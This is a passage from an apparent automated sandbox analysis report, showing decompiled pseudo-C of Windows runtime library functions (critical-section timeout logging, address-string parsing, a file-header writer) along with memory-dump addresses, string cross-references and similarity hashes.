                                                                                                                                                                									}
                                                                                                                                                                									return 2;
                                                                                                                                                                								}
                                                                                                                                                                								goto L36;
                                                                                                                                                                							}
                                                                                                                                                                							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                                							_push(_t67);
                                                                                                                                                                							_t46 = E00B74FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                                							_push(_t77);
                                                                                                                                                                							E00B83F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                                							_t48 =  *_t85;
                                                                                                                                                                							_t92 = _t91 + 0x18;
                                                                                                                                                                							__eflags = _t48 - 0xffffffff;
                                                                                                                                                                							if(_t48 == 0xffffffff) {
                                                                                                                                                                								_t49 = 0;
                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                                							}
                                                                                                                                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                                							_push(_t49);
                                                                                                                                                                							_t50 = _v12;
                                                                                                                                                                							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                                							_push(_t85);
                                                                                                                                                                							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                                							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                                                                                                							E00B83F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                                                                                                							_t53 =  *_t85;
                                                                                                                                                                							_t93 = _t92 + 0x20;
                                                                                                                                                                							_t67 = _t67 + 1;
                                                                                                                                                                							__eflags = _t53 - 0xffffffff;
                                                                                                                                                                							if(_t53 != 0xffffffff) {
                                                                                                                                                                								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                                                                                                							}
                                                                                                                                                                							__eflags = _t67 - 2;
                                                                                                                                                                							if(_t67 > 2) {
                                                                                                                                                                								__eflags = _t85 - 0xc120c0;
                                                                                                                                                                								if(_t85 != 0xc120c0) {
                                                                                                                                                                									_t76 = _a4;
                                                                                                                                                                									__eflags = _a4 - _a8;
                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                										E00BB217A(_t71, __eflags, _t85);
                                                                                                                                                                									}
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                							_push("RTL: Re-Waiting\n");
                                                                                                                                                                							_push(0);
                                                                                                                                                                							_push(0x65);
                                                                                                                                                                							_a8 = _a4;
                                                                                                                                                                							E00B83F92();
                                                                                                                                                                							_t91 = _t93 + 0xc;
                                                                                                                                                                							__eflags =  *0x7ffe0382;
                                                                                                                                                                							if( *0x7ffe0382 != 0) {
                                                                                                                                                                								goto L21;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						goto L36;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					return _t40;
                                                                                                                                                                				}
                                                                                                                                                                				L36:
                                                                                                                                                                			}

































                                                                                                                                                                0x00b924b0
                                                                                                                                                                0x00b924b3
                                                                                                                                                                0x00b924b9
                                                                                                                                                                0x00b924ba
                                                                                                                                                                0x00b924bb
                                                                                                                                                                0x00b924c6
                                                                                                                                                                0x00b924cb
                                                                                                                                                                0x00b924cd
                                                                                                                                                                0x00b924d0
                                                                                                                                                                0x00b924d1
                                                                                                                                                                0x00b924d4
                                                                                                                                                                0x00b924d6
                                                                                                                                                                0x00b924d9
                                                                                                                                                                0x00b924d9
                                                                                                                                                                0x00b924dc
                                                                                                                                                                0x00b924df
                                                                                                                                                                0x00b924e1
                                                                                                                                                                0x00b924e7
                                                                                                                                                                0x00b924e9
                                                                                                                                                                0x00b924ec
                                                                                                                                                                0x00b924ef
                                                                                                                                                                0x00b924f2
                                                                                                                                                                0x00b924f2
                                                                                                                                                                0x00b924ef
                                                                                                                                                                0x00b924e7
                                                                                                                                                                0x00b924fa
                                                                                                                                                                0x00b924ff
                                                                                                                                                                0x00b92501
                                                                                                                                                                0x00b92503
                                                                                                                                                                0x00b92506
                                                                                                                                                                0x00b9250b
                                                                                                                                                                0x00b5eb8c
                                                                                                                                                                0x00b5eb93
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b5eb93
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b5eb99
                                                                                                                                                                0x00b5ec85
                                                                                                                                                                0x00b5ec85
                                                                                                                                                                0x00b5ec85
                                                                                                                                                                0x00000000

                                                                                                                                                                Strings
                                                                                                                                                                • RTL: Re-Waiting, xrefs: 00B924FA
                                                                                                                                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B924BD
                                                                                                                                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B9248D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                • API String ID: 0-3177188983
                                                                                                                                                                • Opcode ID: e62b32b780dde0b148e62ffcb6392abdd36aa982eb11b48d92c5380fb5ee2748
                                                                                                                                                                • Instruction ID: e209ae19d1a81d21385a1e591bb26d8dfa3ebd1b22f42e6ebb8489819d177827
                                                                                                                                                                • Opcode Fuzzy Hash: e62b32b780dde0b148e62ffcb6392abdd36aa982eb11b48d92c5380fb5ee2748
                                                                                                                                                                • Instruction Fuzzy Hash: 1B41C670A00204BBDB24DB68CC85FAA77F9EF45720F2086D5FA699B3D1D774EA418760
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00B6FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				signed int _v12;
                                                                                                                                                                				signed int _v16;
                                                                                                                                                                				signed int _v20;
                                                                                                                                                                				signed int _v24;
                                                                                                                                                                				signed int _v28;
                                                                                                                                                                				signed int _t105;
                                                                                                                                                                				void* _t110;
                                                                                                                                                                				char _t114;
                                                                                                                                                                				short _t115;
                                                                                                                                                                				void* _t118;
                                                                                                                                                                				signed short* _t119;
                                                                                                                                                                				short _t120;
                                                                                                                                                                				char _t122;
                                                                                                                                                                				void* _t127;
                                                                                                                                                                				void* _t130;
                                                                                                                                                                				signed int _t136;
                                                                                                                                                                				intOrPtr _t143;
                                                                                                                                                                				signed int _t158;
                                                                                                                                                                				signed short* _t164;
                                                                                                                                                                				signed int _t167;
                                                                                                                                                                				void* _t170;
                                                                                                                                                                
                                                                                                                                                                				_t158 = 0;
                                                                                                                                                                				_t164 = _a4;
                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                				_t136 = 0;
                                                                                                                                                                				while(1) {
                                                                                                                                                                					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                                					if(_t167 == _t158) {
                                                                                                                                                                						break;
                                                                                                                                                                					}
                                                                                                                                                                					_t118 = _v20 - _t158;
                                                                                                                                                                					if(_t118 == 0) {
                                                                                                                                                                						if(_t167 == 0x3a) {
                                                                                                                                                                							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                                								break;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t119 =  &(_t164[1]);
                                                                                                                                                                								if( *_t119 != _t167) {
                                                                                                                                                                									break;
                                                                                                                                                                								}
                                                                                                                                                                								_t143 = 2;
                                                                                                                                                                								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                								_v28 = 1;
                                                                                                                                                                								_v8 = _t143;
                                                                                                                                                                								_t136 = _t136 + 1;
                                                                                                                                                                								L47:
                                                                                                                                                                								_t164 = _t119;
                                                                                                                                                                								_v20 = _t143;
                                                                                                                                                                								L14:
                                                                                                                                                                								if(_v24 == _t158) {
                                                                                                                                                                									L19:
                                                                                                                                                                									_t164 =  &(_t164[1]);
                                                                                                                                                                									_t158 = 0;
                                                                                                                                                                									continue;
                                                                                                                                                                								}
                                                                                                                                                                								if(_v12 == _t158) {
                                                                                                                                                                									if(_v16 > 4) {
                                                                                                                                                                										L29:
                                                                                                                                                                										return 0xc000000d;
                                                                                                                                                                									}
                                                                                                                                                                									_t120 = E00B6EE02(_v24, _t158, 0x10);
                                                                                                                                                                									_t170 = _t170 + 0xc;
                                                                                                                                                                									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                                									_t136 = _t136 + 1;
                                                                                                                                                                									goto L19;
                                                                                                                                                                								}
                                                                                                                                                                								if(_v16 > 3) {
                                                                                                                                                                									goto L29;
                                                                                                                                                                								}
                                                                                                                                                                								_t122 = E00B6EE02(_v24, _t158, 0xa);
                                                                                                                                                                								_t170 = _t170 + 0xc;
                                                                                                                                                                								if(_t122 > 0xff) {
                                                                                                                                                                									goto L29;
                                                                                                                                                                								}
                                                                                                                                                                								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                                								goto L19;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						L21:
                                                                                                                                                                						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                                							break;
                                                                                                                                                                						} else {
                                                                                                                                                                							if(E00B6685D(_t167, 4) == 0) {
                                                                                                                                                                								if(E00B6685D(_t167, 0x80) != 0) {
                                                                                                                                                                									if(_v12 > 0) {
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									_t127 = 1;
                                                                                                                                                                									_a7 = 1;
                                                                                                                                                                									_v24 = _t164;
                                                                                                                                                                									_v20 = 1;
                                                                                                                                                                									_v16 = 1;
                                                                                                                                                                									L36:
                                                                                                                                                                									if(_v20 == _t127) {
                                                                                                                                                                										goto L19;
                                                                                                                                                                									}
                                                                                                                                                                									_t158 = 0;
                                                                                                                                                                									goto L14;
                                                                                                                                                                								}
                                                                                                                                                                								break;
                                                                                                                                                                							}
                                                                                                                                                                							_a7 = 0;
                                                                                                                                                                							_v24 = _t164;
                                                                                                                                                                							_v20 = 1;
                                                                                                                                                                							_v16 = 1;
                                                                                                                                                                							goto L19;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					_t130 = _t118 - 1;
                                                                                                                                                                					if(_t130 != 0) {
                                                                                                                                                                						if(_t130 == 1) {
                                                                                                                                                                							goto L21;
                                                                                                                                                                						}
                                                                                                                                                                						_t127 = 1;
                                                                                                                                                                						goto L36;
                                                                                                                                                                					}
                                                                                                                                                                					if(_t167 >= 0x80) {
                                                                                                                                                                						L7:
                                                                                                                                                                						if(_t167 == 0x3a) {
                                                                                                                                                                							_t158 = 0;
                                                                                                                                                                							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                                								break;
                                                                                                                                                                							} else {
                                                                                                                                                                								_t119 =  &(_t164[1]);
                                                                                                                                                                								if( *_t119 != _t167) {
                                                                                                                                                                									_v8 = _v8 + 1;
                                                                                                                                                                									L13:
                                                                                                                                                                									_v20 = _t158;
                                                                                                                                                                									goto L14;
                                                                                                                                                                								}
                                                                                                                                                                								if(_v28 != 0) {
                                                                                                                                                                									break;
                                                                                                                                                                								}
                                                                                                                                                                								_v28 = _v8 + 1;
                                                                                                                                                                								_t143 = 2;
                                                                                                                                                                								_v8 = _v8 + _t143;
                                                                                                                                                                								goto L47;
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                                							break;
                                                                                                                                                                						} else {
                                                                                                                                                                							_v12 = _v12 + 1;
                                                                                                                                                                							_t158 = 0;
                                                                                                                                                                							goto L13;
                                                                                                                                                                						}
                                                                                                                                                                					}
                                                                                                                                                                					if(E00B6685D(_t167, 4) != 0) {
                                                                                                                                                                						_v16 = _v16 + 1;
                                                                                                                                                                						goto L19;
                                                                                                                                                                					}
                                                                                                                                                                					if(E00B6685D(_t167, 0x80) != 0) {
                                                                                                                                                                						_v16 = _v16 + 1;
                                                                                                                                                                						if(_v12 > 0) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
                                                                                                                                                                						_a7 = 1;
                                                                                                                                                                						goto L19;
                                                                                                                                                                					}
                                                                                                                                                                					goto L7;
                                                                                                                                                                				}
                                                                                                                                                                				 *_a8 = _t164;
                                                                                                                                                                				if(_v12 != 0) {
                                                                                                                                                                					if(_v12 != 3) {
                                                                                                                                                                						goto L29;
                                                                                                                                                                					}
                                                                                                                                                                					_v8 = _v8 + 1;
                                                                                                                                                                				}
                                                                                                                                                                				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                                					if(_v20 != 1) {
                                                                                                                                                                						if(_v20 != 2) {
                                                                                                                                                                							goto L29;
                                                                                                                                                                						}
                                                                                                                                                                						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                                						L65:
                                                                                                                                                                						_t105 = _v28;
                                                                                                                                                                						if(_t105 != 0) {
                                                                                                                                                                							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                                							E00B48980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                                							_t110 = 8;
                                                                                                                                                                							E00B3DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                                						}
                                                                                                                                                                						return 0;
                                                                                                                                                                					}
                                                                                                                                                                					if(_v12 != 0) {
                                                                                                                                                                						if(_v16 > 3) {
                                                                                                                                                                							goto L29;
                                                                                                                                                                						}
                                                                                                                                                                						_t114 = E00B6EE02(_v24, 0, 0xa);
                                                                                                                                                                						_t170 = _t170 + 0xc;
                                                                                                                                                                						if(_t114 > 0xff) {
                                                                                                                                                                							goto L29;
                                                                                                                                                                						}
                                                                                                                                                                						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                                						goto L65;
                                                                                                                                                                					}
                                                                                                                                                                					if(_v16 > 4) {
                                                                                                                                                                						goto L29;
                                                                                                                                                                					}
                                                                                                                                                                					_t115 = E00B6EE02(_v24, 0, 0x10);
                                                                                                                                                                					_t170 = _t170 + 0xc;
                                                                                                                                                                					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                                					goto L65;
                                                                                                                                                                				} else {
                                                                                                                                                                					goto L29;
                                                                                                                                                                				}
                                                                                                                                                                			}

























                                                                                                                                                                0x00b81ffa
                                                                                                                                                                0x00b81ffd
                                                                                                                                                                0x00b82000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ecf1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ecf1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fe06
                                                                                                                                                                0x00b6fde8
                                                                                                                                                                0x00b6fdec
                                                                                                                                                                0x00b6fdef
                                                                                                                                                                0x00b6fdf2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fdf2
                                                                                                                                                                0x00b6fdcb
                                                                                                                                                                0x00b6fd04
                                                                                                                                                                0x00b6fd05
                                                                                                                                                                0x00b9ec67
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ec6f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ec6f
                                                                                                                                                                0x00b6fd13
                                                                                                                                                                0x00b6fd3c
                                                                                                                                                                0x00b6fd40
                                                                                                                                                                0x00b9ec75
                                                                                                                                                                0x00b9ec7a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ec8a
                                                                                                                                                                0x00b9ec8a
                                                                                                                                                                0x00b9ec90
                                                                                                                                                                0x00b9ecb2
                                                                                                                                                                0x00b6fd73
                                                                                                                                                                0x00b6fd73
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd73
                                                                                                                                                                0x00b9ec95
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eca1
                                                                                                                                                                0x00b9eca4
                                                                                                                                                                0x00b9eca5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9eca5
                                                                                                                                                                0x00b9ec7a
                                                                                                                                                                0x00b6fd4a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd6e
                                                                                                                                                                0x00b6fd6e
                                                                                                                                                                0x00b6fd71
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd71
                                                                                                                                                                0x00b6fd4a
                                                                                                                                                                0x00b6fd21
                                                                                                                                                                0x00b7a3a1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b7a3a1
                                                                                                                                                                0x00b6fd36
                                                                                                                                                                0x00b8200b
                                                                                                                                                                0x00b82012
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b82018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b82018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b6fd36
                                                                                                                                                                0x00b6fe0f
                                                                                                                                                                0x00b6fe16
                                                                                                                                                                0x00b7a3ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b7a3b3
                                                                                                                                                                0x00b7a3b3
                                                                                                                                                                0x00b6fe1f
                                                                                                                                                                0x00b9ed25
                                                                                                                                                                0x00b9ed86
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed91
                                                                                                                                                                0x00b9ed95
                                                                                                                                                                0x00b9ed95
                                                                                                                                                                0x00b9ed9a
                                                                                                                                                                0x00b9edad
                                                                                                                                                                0x00b9edb3
                                                                                                                                                                0x00b9edba
                                                                                                                                                                0x00b9edc4
                                                                                                                                                                0x00b9edc9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9edcc
                                                                                                                                                                0x00b9ed2a
                                                                                                                                                                0x00b9ed55
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed61
                                                                                                                                                                0x00b9ed66
                                                                                                                                                                0x00b9ed6e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed7d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed7d
                                                                                                                                                                0x00b9ed30
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9ed3c
                                                                                                                                                                0x00b9ed43
                                                                                                                                                                0x00b9ed4b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fassign
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3965848254-0
                                                                                                                                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                • Instruction ID: 1ee0fc6cb7031e397860ece37207457877ad8a6980b51314c9df2dca2910711e
                                                                                                                                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                • Instruction Fuzzy Hash: F691AF71E0020AEBDF24DF68D8456BEBBF4FF55304F2080BAD411A7162E739AA51CB91
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                			E00BEE9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                                				signed int _v5;
                                                                                                                                                                				int _v12;
                                                                                                                                                                				signed int _v16;
                                                                                                                                                                				char _v20;
                                                                                                                                                                				int _v24;
                                                                                                                                                                				signed int _v28;
                                                                                                                                                                				int _v32;
                                                                                                                                                                				signed int _v36;
                                                                                                                                                                				signed int _v40;
                                                                                                                                                                				signed int _v44;
                                                                                                                                                                				signed int _v48;
                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                				char _v60;
                                                                                                                                                                				signed int _v64;
                                                                                                                                                                				char _v68;
                                                                                                                                                                				intOrPtr _v72;
                                                                                                                                                                				intOrPtr _v76;
                                                                                                                                                                				intOrPtr _v80;
                                                                                                                                                                				intOrPtr _v84;
				void _v96;
				char _v100;
				void _v140;
				char _v144;
				intOrPtr _v160;
				intOrPtr _v164;
				char _v172;
				char _v216;
				char _v220;
				void* __edi;
				void* __esi;
				void* _t231;
				signed char _t233;
				signed int _t237;
				signed int _t238;
				signed int _t244;
				short _t251;
				signed int _t253;
				signed int* _t254;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t260;
				signed int _t267;
				signed int _t271;
				intOrPtr _t281;
				signed int _t314;
				signed char _t316;
				signed int _t319;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t332;
				signed int _t334;
				int _t340;
				intOrPtr* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t352;
				void* _t360;
				intOrPtr* _t370;
				intOrPtr _t371;
				intOrPtr* _t372;

				_t360 = __edx;
				_t340 = 0;
				_t345 = 0xa;
				_v144 = 0;
				memset( &_v140, 0, _t345 << 2);
				_v20 = 0;
				_v220 = 0;
				E00B3DFC0( &_v216, 0, 0x2c);
				_t371 = _a8;
				_t347 = 7;
				_v100 = 0;
				_t231 = memset( &_v96, 0, _t347 << 2);
				_t348 = 0;
				_v12 = 0;
				_v32 = 0;
				_v24 = 0;
				_v5 = _t231;
				if(_t371 != 0) {
					_v5 = 1;
				}
				_t370 = _a4;
				_t233 =  *(_t370 + 0xcc) >> 3;
				_t380 = _t233 & 0x00000001;
				if((_t233 & 0x00000001) != 0) {
					E00BEE919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
				}
				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
				_v16 =  *(_t370 + 0x80);
				if(_v5 != _t340) {
					_t42 = _t371 + 0x20; // 0xbec2d6
					_v32 = _t42;
					_t44 = _t371 + 4; // 0x5bcd335e
					_t237 =  *_t44 & 0x0000ffff;
					_v24 = _t237;
					_t238 = _t237 + 0x48;
					__eflags = _t238;
					L12:
					_v28 = _t238;
					_t372 = E00B3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
					if(_t372 != _t340) {
						_t54 = _t372 + 0x48; // 0x48
						_t341 = _t54;
						_t244 = E00BEE519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
						__eflags = _t244;
						_a4 = _t244;
						if(_t244 < 0) {
							L49:
							__eflags = _v12;
							if(_v12 != 0) {
								E00B2F9F0(_v12);
							}
							L51:
							_t340 = 0;
							__eflags = 0;
							L52:
							if(_t372 != _t340) {
								E00B3E025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
							}
							L54:
							return _a4;
						}
						__eflags = _a12 - 1;
						if(_a12 != 1) {
							 *_t372 = _v16;
							_t251 = 4;
							 *((short*)(_t372 + 0x36)) = _t251;
							 *((short*)(_t372 + 0x34)) = 1;
							_t253 = _v28;
							 *((char*)(_t372 + 0x29)) = 8;
							 *(_t372 + 0x30) = _t253;
							__eflags = _v5;
							if(_v5 != 0) {
								_t254 = _v32;
								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
								_t254[9] = 1;
								 *_t254 =  *(_t370 + 0x80);
								 *((char*)(_t372 + 0x6e)) = 1;
								 *((char*)(_t372 + 0x6f)) = 5;
								__eflags = _t254[0xb] - 8;
								if(_t254[0xb] != 8) {
									_t187 =  &(_t254[0x42]); // 0xf938e834
									_t255 =  *_t187;
								} else {
									_t186 =  &(_t254[0x44]); // 0x14538910
									_t255 =  *_t186;
								}
								 *(_t370 + 0x10) = _t255;
								E00B32340(_t341, _a8, _v24);
								L39:
								_t257 =  *(_t372 + 0x30);
								_t342 = _v16;
								__eflags = _t257 - _t342;
								if(_t257 < _t342) {
									__eflags = _t257 - 0x48;
									if(_t257 > 0x48) {
										__eflags = _t257 + _t372;
										E00B3DFC0(_t257 + _t372, 0xff, _t342 - _t257);
									}
								}
								_push(0);
								_push(0);
								_push(_t342);
								_push(_t372);
								_t348 =  &_v60;
								_push( &_v60);
								_push(0);
								_push(0);
								_push(0);
								_t259 = E00B2F938(_v12);
								_a4 = _t259;
								__eflags = _t259;
								if(_t259 < 0) {
									goto L49;
								} else {
									_t260 =  *(_t370 + 0xc8);
									__eflags = _t260;
									if(_t260 == 0) {
										L48:
										_t348 = _v12;
										 *(_t370 + 0x100) = 1;
										 *(_t370 + 0xd8) = 1;
										__eflags = 0;
										 *(_t370 + 0xf0) = _t342;
										 *(_t370 + 0xf4) = 0;
										 *(_t370 + 0xe8) = _t342;
										 *(_t370 + 0xec) = 0;
										 *(_t370 + 0x5c) = _v12;
										_v12 = 0;
										goto L49;
									}
									_t352 =  *(_t370 + 0xcc);
									__eflags = _t352 & 0x00000020;
									if((_t352 & 0x00000020) == 0) {
										goto L48;
									}
									__eflags = _t352 & 0x00002000;
									_t348 = 0x400;
									if((_t352 & 0x00002000) == 0) {
										_t348 = 0x100000;
									}
									_push(0x14);
									_v40 = _t260 * _t348;
									_push(8);
									_push( &_v40);
									_push( &_v60);
									_v36 = _t260 * _t348 >> 0x20;
									_t267 = E00B2FC48(_v12);
									_a4 = _t267;
                                                                                                                                                                									__eflags = _t267;
                                                                                                                                                                									if(_t267 < 0) {
                                                                                                                                                                										goto L49;
                                                                                                                                                                									} else {
                                                                                                                                                                										goto L48;
                                                                                                                                                                									}
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
                                                                                                                                                                							 *_t341 = 0xc0010000;
                                                                                                                                                                							_t271 =  *(_t370 + 0x10);
                                                                                                                                                                							__eflags = _t271 - 2;
                                                                                                                                                                							if(_t271 != 2) {
                                                                                                                                                                								__eflags = _t271 - 3;
                                                                                                                                                                								if(_t271 != 3) {
                                                                                                                                                                									_v48 = 0;
                                                                                                                                                                									_v44 = 0;
                                                                                                                                                                									E00B42954(1, _t372,  &_v48);
                                                                                                                                                                									 *(_t341 + 0x10) = _v48;
                                                                                                                                                                									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
                                                                                                                                                                									L34:
                                                                                                                                                                									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
                                                                                                                                                                									 *((intOrPtr*)(_t341 + 8)) = _v160;
                                                                                                                                                                									 *((intOrPtr*)(_t341 + 0x18)) = E00B74FC0(_v84, _v80, _v140, 0);
                                                                                                                                                                									 *((intOrPtr*)(_t341 + 0x1c)) = E00B74FC0(_v76, _v72, _v140, 0);
                                                                                                                                                                									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                                									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
                                                                                                                                                                									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
                                                                                                                                                                									 *((char*)(_t372 + 0x6e)) = 1;
                                                                                                                                                                									 *((char*)(_t372 + 0x6f)) = 5;
                                                                                                                                                                									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
                                                                                                                                                                									 *(_t372 + 0x170) =  *(_t370 + 0x10);
                                                                                                                                                                									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
                                                                                                                                                                									 *((intOrPtr*)(_t372 + 0x90)) = 1;
                                                                                                                                                                									 *(_t372 + 0x8c) = 1;
